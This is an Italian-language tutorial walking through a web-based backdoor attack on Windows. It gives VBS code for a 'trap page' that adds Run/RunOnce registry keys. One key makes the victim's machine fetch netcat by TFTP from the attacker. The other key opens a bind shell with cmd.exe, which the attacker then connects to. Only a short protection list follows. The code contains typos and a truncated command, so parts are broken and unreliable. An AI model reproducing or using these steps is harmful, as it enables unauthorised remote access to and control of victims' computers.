INTRODUZIONE
Questa tipologia di attacco è molto facile da portare a termine quanto proteggersi.
Basta una svista per compromettere l’intero sistema e ritrovarsi una backdoor accessibile a tutti.

PREPARAZIONE DELL’ATTACCO
– Scaricate NETCAT e posizionatelo sul disco C:/ (http://www.vulnwatch.org/netcat/)
– Scaricate PuTTy (http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html)
– Scaricate e installate Tftpd32. (http://tftpd32.jounin.net/)
Dopo aver installato Tftpd32 avviatelo e cliccate sull’etichetta ‘Tftp Server’. Dopodichè in server interface mettete il vostro indirizzo ip.
Informazione: Per vedere il proprio indirizzo ip si può aprire il cmd.exe e digitare ‘ipconfig’ oppure andando su uno dei tanti servizi come myip.it.

Per l’attacker manca solo la pagina trappola. Ovvero una pagina html con dentro uno script VBS (Visual Basic Script) che l’utente potrà o meno eseguire al momento dell’apertura della pagina.
Il seguente codice aggiunge due chiavi al regedit. A voi capire il giusto funzionamento
Codice:
<script>
set WshShell=CreateOnject("WScript.Shell")
WshShell.RegWrite
"HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\HACK1", "at 10:37 cmd /c tftp -i <IP> get nc.exe"
EshShell.RegWrite
"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\HACK2","at 10:38 cmd /c nc -nv -L -p <PORTA> -e cmd.exe"
</script>

Compilatelo nei campi <IP>, <PORTA> e nelle DATE per poi salvarlo e caricarlo sul vostro sito trappola.

ATTACCO
Adesso controllando Tftpd32 dovreste capire quando un utente scarica o meno netcat dal nostro pc. Lo possiamo capire dall’area di testo ‘Tftpd Server’.
L’ip 192.168.0.1 ha "abboccato all’amo"…
Dopo che la vittima avrà scaricato netcat e il regedit lo avrà eseguito all’ora che avrete stabilito, non vi resta altro che avviare PuTTy o la console e digitare:
C:\>nc.exe -nv
Dove per IP e PORTA andrà l’IP della vittima e la porta che avrete settato in precedenza e se tutto è andato a buon fine, dovreste avere accesso al sistema vittima con i permessi dell’utente che ha avviato netcat.

PROTEZIONE
Per proteggersi da questa tipologia di attacchi è indispensabile:
1. Disabilitare gli ActiveX dal Browser
1.1 Scegliere un browser alternativo come Mozilla Firefox
2. Aver installato un Firewall e un Antivirus per individuare Netcat.
3. Controllare di non avere processi con nomi strani o con nomi simili a nc.exe, netc.exe, ncat.exe…